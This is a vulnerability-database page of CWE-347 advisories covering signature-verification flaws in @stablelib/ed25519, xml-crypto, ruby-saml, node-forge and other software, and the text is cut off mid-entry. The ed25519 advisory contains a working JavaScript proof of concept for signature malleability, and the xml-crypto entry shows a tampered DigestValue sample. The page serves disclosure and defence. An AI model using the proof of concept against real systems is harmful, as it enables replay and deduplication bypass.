CWE-347
AllowedImproper Verification of Cryptographic Signature
Abstraction: Base · Status: Draft
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
1123 vulnerabilities reference this CWE, most recent first.
GHSA-X3FF-W252-2G7J
Vulnerability from github – Published: 2026-04-01 22:13 – Updated: 2026-04-07 14:23Ed25519 Signature Malleability via Missing S < L Check -- Same Class as node-forge CVE-2026-33895 (CWE-347)
Target
- Repository: StableLib/stablelib (package: @stablelib/ed25519)
- Platform: GitHub PVR
- Bounty: CVE credit
- CWE: CWE-347 (Improper Verification of Cryptographic Signature)
- Version: 2.0.2 (latest, 2026-03-28)
Root Cause
The verify() function in @stablelib/ed25519 does not check that the S component of the signature is less than the group order L. Per CFRG recommendations and the ZIP-215 specification, Ed25519 implementations should reject signatures where S >= L to prevent signature malleability.
When S >= L, [S]B = [(S mod L)]B = [(S - L)]B, meaning two different 32-byte S values produce the same verification result. An attacker who observes a valid signature (R, S) can produce a second valid signature (R, S + L) for the same message.
Vulnerable code
File: packages/ed25519/ed25519.ts (compiled: lib/ed25519.js:779-802)
export function verify(publicKey, message, signature) {
// ... length check, unpack public key ...
const hs = new SHA512();
hs.update(signature.subarray(0, 32)); // R
hs.update(publicKey); // A
hs.update(message); // M
const h = hs.digest();
reduce(h); // h is reduced mod L
scalarmult(p, q, h); // [h](-A)
scalarbase(q, signature.subarray(32)); // [S]B -- S NOT checked or reduced
edadd(p, q);
pack(t, p);
if (verify32(signature, t)) { // compare R
return false;
}
return true;
}
Note that h is properly reduce()d (line 794), but S (signature bytes 32-63) is passed directly to scalarbase() without any range check.
Proof of Concept
const ed = require('@stablelib/ed25519');
const kp = ed.generateKeyPair();
const msg = new TextEncoder().encode("Hello, world!");
const sig = ed.sign(kp.secretKey, msg);
console.log("Original valid:", ed.verify(kp.publicKey, msg, sig)); // true
// Ed25519 group order L
const L = [
0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10
];
// Add L to S component to create malleable signature
const malSig = new Uint8Array(64);
malSig.set(sig.subarray(0, 32)); // R unchanged
let carry = 0;
for (let i = 0; i < 32; i++) {
const sum = sig[32 + i] + L[i] + carry;
malSig[32 + i] = sum & 0xff;
carry = sum >> 8;
}
console.log("Malleable valid:", ed.verify(kp.publicKey, msg, malSig)); // true
console.log("Sigs differ:", !sig.every((b, i) => b === malSig[i])); // true
Output:
Original valid: true
Malleable valid: true
Sigs differ: true
Impact
- Signature malleability: Given any valid signature, an attacker can produce a second distinct valid signature for the same message without knowing the private key
- Transaction ID collision: Applications using signature bytes as unique identifiers (e.g., blockchain transaction IDs) are vulnerable to replay/double-spend attacks
- Deduplication bypass: Systems deduplicating by signature value accept the same message twice with different "signatures"
- Same vulnerability class as node-forge CVE-2026-33895 (GHSA-q67f-28xg-22rw), rated HIGH
Suggested Fix
Add an S < L check before processing the signature:
// L in little-endian
const L = new Uint8Array([
0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10
]);
function scalarLessThanL(s) {
for (let i = 31; i >= 0; i--) {
if (s[i] < L[i]) return true;
if (s[i] > L[i]) return false;
}
return false; // equal to L, reject
}
export function verify(publicKey, message, signature) {
// ... existing checks ...
if (!scalarLessThanL(signature.subarray(32))) {
return false; // S >= L, reject
}
// ... rest of verify ...
}
Self-Review
- Is this by-design? No explicit documentation suggests malleability is intended. The library is described as implementing "Ed25519 public-key signature (EdDSA with Curve25519)" with no caveat about malleability.
- Is RFC 8032 strict about this? No. RFC 8032 does not require S < L. However, the CFRG recommends it, ZIP-215 requires it, and the node-forge advisory (CVE-2026-33895) treats the identical issue as HIGH severity.
- Is this already reported? No. No existing issues or CVEs for @stablelib/ed25519 regarding malleability or S < L.
- Honest weaknesses: (1) RFC 8032 does not strictly require S < L. (2) Not all applications are affected -- only those depending on signature uniqueness. (3) This is malleability, not forgery -- the attacker cannot sign new messages. (4) tweetnacl has the same issue and considers it a known limitation.
- CVSS: Medium (5.3). AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N -- can produce alternate valid signatures, limited integrity impact.
Solution
Upgrade to version 2.1.0.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@stablelib/ed25519"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T22:13:35Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "# Ed25519 Signature Malleability via Missing S \u003c L Check -- Same Class as node-forge CVE-2026-33895 (CWE-347)\n\n## Target\n- Repository: StableLib/stablelib (package: @stablelib/ed25519)\n- Platform: GitHub PVR\n- Bounty: CVE credit\n- CWE: CWE-347 (Improper Verification of Cryptographic Signature)\n- Version: 2.0.2 (latest, 2026-03-28)\n\n## Root Cause\n\nThe `verify()` function in `@stablelib/ed25519` does not check that the `S` component of the signature is less than the group order `L`. Per CFRG recommendations and the ZIP-215 specification, Ed25519 implementations should reject signatures where `S \u003e= L` to prevent signature malleability.\n\nWhen `S \u003e= L`, `[S]B = [(S mod L)]B = [(S - L)]B`, meaning two different 32-byte `S` values produce the same verification result. An attacker who observes a valid signature `(R, S)` can produce a second valid signature `(R, S + L)` for the same message.\n\n### Vulnerable code\n\n**File:** `packages/ed25519/ed25519.ts` (compiled: `lib/ed25519.js:779-802`)\n\n```javascript\nexport function verify(publicKey, message, signature) {\n // ... length check, unpack public key ...\n const hs = new SHA512();\n hs.update(signature.subarray(0, 32)); // R\n hs.update(publicKey); // A\n hs.update(message); // M\n const h = hs.digest();\n reduce(h); // h is reduced mod L\n scalarmult(p, q, h); // [h](-A)\n scalarbase(q, signature.subarray(32)); // [S]B -- S NOT checked or reduced\n edadd(p, q);\n pack(t, p);\n if (verify32(signature, t)) { // compare R\n return false;\n }\n return true;\n}\n```\n\nNote that `h` is properly `reduce()`d (line 794), but `S` (signature bytes 32-63) is passed directly to `scalarbase()` without any range check.\n\n## Proof of Concept\n\n```javascript\nconst ed = require(\u0027@stablelib/ed25519\u0027);\n\nconst kp = ed.generateKeyPair();\nconst msg = new TextEncoder().encode(\"Hello, world!\");\nconst sig = ed.sign(kp.secretKey, msg);\n\nconsole.log(\"Original valid:\", ed.verify(kp.publicKey, msg, sig)); // true\n\n// Ed25519 group order L\nconst L = [\n 0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n 0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10\n];\n\n// Add L to S component to create malleable signature\nconst malSig = new Uint8Array(64);\nmalSig.set(sig.subarray(0, 32)); // R unchanged\nlet carry = 0;\nfor (let i = 0; i \u003c 32; i++) {\n const sum = sig[32 + i] + L[i] + carry;\n malSig[32 + i] = sum \u0026 0xff;\n carry = sum \u003e\u003e 8;\n}\n\nconsole.log(\"Malleable valid:\", ed.verify(kp.publicKey, msg, malSig)); // true\nconsole.log(\"Sigs differ:\", !sig.every((b, i) =\u003e b === malSig[i])); // true\n```\n\n**Output:**\n```\nOriginal valid: true\nMalleable valid: true\nSigs differ: true\n```\n\n## Impact\n\n- **Signature malleability**: Given any valid signature, an attacker can produce a second distinct valid signature for the same message without knowing the private key\n- **Transaction ID collision**: Applications using signature bytes as unique identifiers (e.g., blockchain transaction IDs) are vulnerable to replay/double-spend attacks\n- **Deduplication bypass**: Systems deduplicating by signature value accept the same message twice with different \"signatures\"\n- **Same vulnerability class** as node-forge CVE-2026-33895 (GHSA-q67f-28xg-22rw), rated HIGH\n\n## Suggested Fix\n\nAdd an S \u003c L check before processing the signature:\n\n```javascript\n// L in little-endian\nconst L = new Uint8Array([\n 0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n 0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10\n]);\n\nfunction scalarLessThanL(s) {\n for (let i = 31; i \u003e= 0; i--) {\n if (s[i] \u003c L[i]) return true;\n if (s[i] \u003e L[i]) return false;\n }\n return false; // equal to L, reject\n}\n\nexport function verify(publicKey, message, signature) {\n // ... existing checks ...\n if (!scalarLessThanL(signature.subarray(32))) {\n return false; // S \u003e= L, reject\n }\n // ... rest of verify ...\n}\n```\n\n## Self-Review\n\n- **Is this by-design?** No explicit documentation suggests malleability is intended. The library is described as implementing \"Ed25519 public-key signature (EdDSA with Curve25519)\" with no caveat about malleability.\n- **Is RFC 8032 strict about this?** No. RFC 8032 does not require S \u003c L. However, the CFRG recommends it, ZIP-215 requires it, and the node-forge advisory (CVE-2026-33895) treats the identical issue as HIGH severity.\n- **Is this already reported?** No. No existing issues or CVEs for @stablelib/ed25519 regarding malleability or S \u003c L.\n- **Honest weaknesses:** (1) RFC 8032 does not strictly require S \u003c L. (2) Not all applications are affected -- only those depending on signature uniqueness. (3) This is malleability, not forgery -- the attacker cannot sign new messages. (4) tweetnacl has the same issue and considers it a known limitation.\n- **CVSS:** Medium (5.3). AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N -- can produce alternate valid signatures, limited integrity impact.\n\n## Solution\n\nUpgrade to version 2.1.0.",
"id": "GHSA-x3ff-w252-2g7j",
"modified": "2026-04-07T14:23:20Z",
"published": "2026-04-01T22:13:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/StableLib/stablelib/security/advisories/GHSA-x3ff-w252-2g7j"
},
{
"type": "PACKAGE",
"url": "https://github.com/StableLib/stablelib"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "StableLib Ed25519 Signature Malleability via Missing S \u003c L Check"
}
GHSA-X3JR-PF6G-C48F
Vulnerability from github – Published: 2022-05-24 16:46 – Updated: 2023-10-02 15:42A message-forgery issue was discovered in crypto/openpgp/clearsign/clearsign.go in supplementary Go cryptography libraries 2019-03-25. According to the OpenPGP Message Format specification in RFC 4880 chapter 7, a cleartext signed message can contain one or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the message digest algorithm(s) used for the signature. However, the Go clearsign package ignores the value of this header, which allows an attacker to spoof it. Consequently, an attacker can lead a victim to believe the signature was generated using a different message digest algorithm than what was actually used. Moreover, since the library skips Armor Header parsing in general, an attacker can not only embed arbitrary Armor Headers, but also prepend arbitrary text to cleartext messages without invalidating the signatures.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "golang.org/x/crypto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20190424203555-c05e17bb3b2d"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-11841"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2023-08-01T23:32:27Z",
"nvd_published_at": "2019-05-22T17:29:00Z",
"severity": "MODERATE"
},
"details": "A message-forgery issue was discovered in `crypto/openpgp/clearsign/clearsign.go` in supplementary Go cryptography libraries 2019-03-25. According to the OpenPGP Message Format specification in RFC 4880 chapter 7, a cleartext signed message can contain one or more optional \"Hash\" Armor Headers. The \"Hash\" Armor Header specifies the message digest algorithm(s) used for the signature. However, the Go clearsign package ignores the value of this header, which allows an attacker to spoof it. Consequently, an attacker can lead a victim to believe the signature was generated using a different message digest algorithm than what was actually used. Moreover, since the library skips Armor Header parsing in general, an attacker can not only embed arbitrary Armor Headers, but also prepend arbitrary text to cleartext messages without invalidating the signatures.",
"id": "GHSA-x3jr-pf6g-c48f",
"modified": "2023-10-02T15:42:07Z",
"published": "2022-05-24T16:46:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11841"
},
{
"type": "WEB",
"url": "https://github.com/golang/crypto/commit/c05e17bb3b2dca130fc919668a96b4bec9eb9442"
},
{
"type": "PACKAGE",
"url": "https://github.com/golang/crypto/tree/master/openpgp/clearsign"
},
{
"type": "WEB",
"url": "https://go-review.git.corp.google.com/c/crypto/+/173778"
},
{
"type": "WEB",
"url": "https://go.googlesource.com/crypto/+/c05e17bb3b2dca130fc919668a96b4bec9eb9442"
},
{
"type": "WEB",
"url": "https://groups.google.com/d/msg/golang-openpgp/6vdgZoTgbIY/K6bBY9z3DAAJ"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00011.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00017.html"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2023-1992"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20201207161832/https://sec-consult.com/en/blog/advisories/cleartext-message-spoofing-in-go-cryptography-libraries-cve-2019-11841"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/152840/Go-Cryptography-Libraries-Cleartext-Message-Spoofing.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Golang/x/crypto message forgery vulnerability"
}
GHSA-X3M8-899R-F7C3
Vulnerability from github – Published: 2025-03-14 17:16 – Updated: 2025-03-16 21:34Impact
An attacker may be able to exploit this vulnerability to bypass authentication or authorization mechanisms in systems that rely on xml-crypto for verifying signed XML documents. The vulnerability allows an attacker to modify a valid signed XML message in a way that still passes signature verification checks. For example, it could be used to alter critical identity or access control attributes, enabling an attacker to escalate privileges or impersonate another user.
Patches
All versions <= 6.0.0 are affected. Please upgrade to version 6.0.1.
If you are still using v2.x or v3.x please upgrade to the associated patch version.
Indicators of Compromise
When logging XML payloads, check for the following indicators. If the payload includes encrypted elements, ensure you analyze the decrypted version for a complete assessment. (If encryption is not used, analyze the original XML document directly). This applies to various XML-based authentication and authorization flows, such as SAML Response payloads.
Presence of Comments in DigestValue
A DigestValue should not contain comments. If you find comments within it, this may indicate tampering.
Example of a compromised DigestValue:
<DigestValue>
<!--TBlYWE0ZWM4ODI1NjliYzE3NmViN2E1OTlkOGDhhNmI=-->
c7RuVDYo83z2su5uk0Nla8DXcXvKYKgf7tZklJxL/LZ=
</DigestValue>
Code to test
Pass in the decrypted version of the document
decryptedDocument = ... // yours to implement
const digestValues = xpath.select(
"//*[local-name()='DigestValue'][count(node()) > 1]",
decryptedDocument,
);
if (digestValues.length > 0) {
// Compromise detected, yours to implement
}
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "xml-crypto"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "6.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "xml-crypto"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "xml-crypto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-29775"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-14T17:16:47Z",
"nvd_published_at": "2025-03-14T18:15:32Z",
"severity": "CRITICAL"
},
"details": "# Impact\nAn attacker may be able to exploit this vulnerability to bypass authentication or authorization mechanisms in systems that rely on xml-crypto for verifying signed XML documents. The vulnerability allows an attacker to modify a valid signed XML message in a way that still passes signature verification checks. For example, it could be used to alter critical identity or access control attributes, enabling an attacker to escalate privileges or impersonate another user.\n\n# Patches\nAll versions \u003c= 6.0.0 are affected. Please upgrade to version 6.0.1.\n\nIf you are still using v2.x or v3.x please upgrade to the associated patch version.\n\n# Indicators of Compromise\n\nWhen logging XML payloads, check for the following indicators. If the payload includes encrypted elements, ensure you analyze the decrypted version for a complete assessment. (If encryption is not used, analyze the original XML document directly). This applies to various XML-based authentication and authorization flows, such as SAML Response payloads.\n\n### Presence of Comments in `DigestValue`\nA `DigestValue` should **not** contain comments. If you find comments within it, this may indicate tampering.\n\n**Example of a compromised `DigestValue`:**\n```xml\n\u003cDigestValue\u003e\n \u003c!--TBlYWE0ZWM4ODI1NjliYzE3NmViN2E1OTlkOGDhhNmI=--\u003e\n c7RuVDYo83z2su5uk0Nla8DXcXvKYKgf7tZklJxL/LZ=\n\u003c/DigestValue\u003e\n```\n\n### Code to test\n\nPass in the decrypted version of the document\n```js\ndecryptedDocument = ... // yours to implement\n\nconst digestValues = xpath.select(\n \"//*[local-name()=\u0027DigestValue\u0027][count(node()) \u003e 1]\",\n decryptedDocument,\n);\n\nif (digestValues.length \u003e 0) {\n // Compromise detected, yours to implement\n}\n```",
"id": "GHSA-x3m8-899r-f7c3",
"modified": "2025-03-16T21:34:52Z",
"published": "2025-03-14T17:16:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/security/advisories/GHSA-x3m8-899r-f7c3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29775"
},
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/commit/28f92218ecbb8dcbd238afa4efbbd50302aa9aed"
},
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/commit/886dc63a8b4bb5ae1db9f41c7854b171eb83aa98"
},
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/commit/8ac6118ee7978b46aa56b82cbcaa5fca58c93a07"
},
{
"type": "PACKAGE",
"url": "https://github.com/node-saml/xml-crypto"
},
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/releases/tag/v2.1.6"
},
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/releases/tag/v3.2.1"
},
{
"type": "WEB",
"url": "https://github.com/node-saml/xml-crypto/releases/tag/v6.0.1"
},
{
"type": "WEB",
"url": "https://workos.com/blog/samlstorm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "xml-crypto Vulnerable to XML Signature Verification Bypass via DigestValue Comment"
}
GHSA-X4H9-GWV3-R4M4
Vulnerability from github – Published: 2025-12-08 22:03 – Updated: 2025-12-12 21:52Summary
Ruby-saml up to and including 1.12.4, there is an authentication bypass vulnerability because of an issue at libxml2 canonicalization process used by Nokogiri for document transformation. That allows an attacker to be able to execute a Signature Wrapping attack. The vulnerability does not affect the version 1.18.0.
Details
When libxml2’s canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. ruby-saml then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded.
Impact
-
Digest bypass: By crafting input that causes canonicalization to yield an empty string, the attacker can manipulate validation to pass incorrectly.
-
Signature replay on empty canonical form: If an empty string has been signed once (e.g., in a prior interaction or via a misconfigured flow), that signature can potentially be replayed to bypass authentication.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "ruby-saml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.18.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66568"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-08T22:03:19Z",
"nvd_published_at": "2025-12-09T16:18:21Z",
"severity": "CRITICAL"
},
"details": "### Summary\nRuby-saml up to and including 1.12.4, there is an authentication bypass vulnerability because of an issue at libxml2 canonicalization process used by Nokogiri for document transformation. That allows an attacker to be able to execute a Signature Wrapping attack. The vulnerability does not affect the version 1.18.0.\n\n### Details\nWhen libxml2\u2019s canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. ruby-saml then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded.\n\n### Impact\n1. Digest bypass: By crafting input that causes canonicalization to yield an empty string, the attacker can manipulate validation to pass incorrectly.\n\n2. Signature replay on empty canonical form: If an empty string has been signed once (e.g., in a prior interaction or via a misconfigured flow), that signature can potentially be replayed to bypass authentication.",
"id": "GHSA-x4h9-gwv3-r4m4",
"modified": "2025-12-12T21:52:40Z",
"published": "2025-12-08T22:03:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-x4h9-gwv3-r4m4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66568"
},
{
"type": "WEB",
"url": "https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a"
},
{
"type": "PACKAGE",
"url": "https://github.com/SAML-Toolkits/ruby-saml"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ruby-saml/CVE-2025-66568.yml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Ruby-saml allows a Libxml2 Canonicalization error to bypass Digest/Signature validation"
}
GHSA-X4JG-MJRX-434G
Vulnerability from github – Published: 2022-03-18 23:10 – Updated: 2022-03-30 20:07Impact
RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a DigestInfo ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.
Patches
The issue has been addressed in node-forge 1.3.0.
References
For more information, please see "Bleichenbacher's RSA signature forgery based on implementation error" by Hal Finney.
For more information
If you have any questions or comments about this advisory: * Open an issue in forge * Email us at example email address
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-24772"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2022-03-18T23:10:28Z",
"nvd_published_at": "2022-03-18T14:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### References\n\nFor more information, please see\n[\"Bleichenbacher\u0027s RSA signature forgery based on implementation error\"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)\nby Hal Finney.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)",
"id": "GHSA-x4jg-mjrx-434g",
"modified": "2022-03-30T20:07:56Z",
"published": "2022-03-18T23:10:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-x4jg-mjrx-434g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24772"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Improper Verification of Cryptographic Signature in node-forge"
}
GHSA-X4QP-X57C-WV5H
Vulnerability from github – Published: 2022-05-13 01:20 – Updated: 2022-05-13 01:20An issue was discovered in certain Apple products. macOS before 10.13.4 is affected. The issue involves the "Mail" component. It allows man-in-the-middle attackers to read S/MIME encrypted message content by sending HTML e-mail that references remote resources but lacks a valid S/MIME signature.
{
"affected": [],
"aliases": [
"CVE-2018-4111"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-03T06:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in certain Apple products. macOS before 10.13.4 is affected. The issue involves the \"Mail\" component. It allows man-in-the-middle attackers to read S/MIME encrypted message content by sending HTML e-mail that references remote resources but lacks a valid S/MIME signature.",
"id": "GHSA-x4qp-x57c-wv5h",
"modified": "2022-05-13T01:20:14Z",
"published": "2022-05-13T01:20:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-4111"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT208692"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/103582"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1040608"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X5H4-9GQW-942J
Vulnerability from github – Published: 2021-06-01 21:17 – Updated: 2021-06-01 19:12Impact
This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages.
This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages.
For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit.
Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data.
Patches
Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues.
Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
Workarounds
None
For more information
https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs
https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "aws-encryption-sdk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "aws-encryption-sdk"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2021-06-01T19:12:22Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\n\nThis advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. \n\nThis ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. \n\nFor customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit.\n\nFinally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data.\n\n### Patches\n\nFixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues.\n\nCustomers leveraging the ESDK\u2019s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any 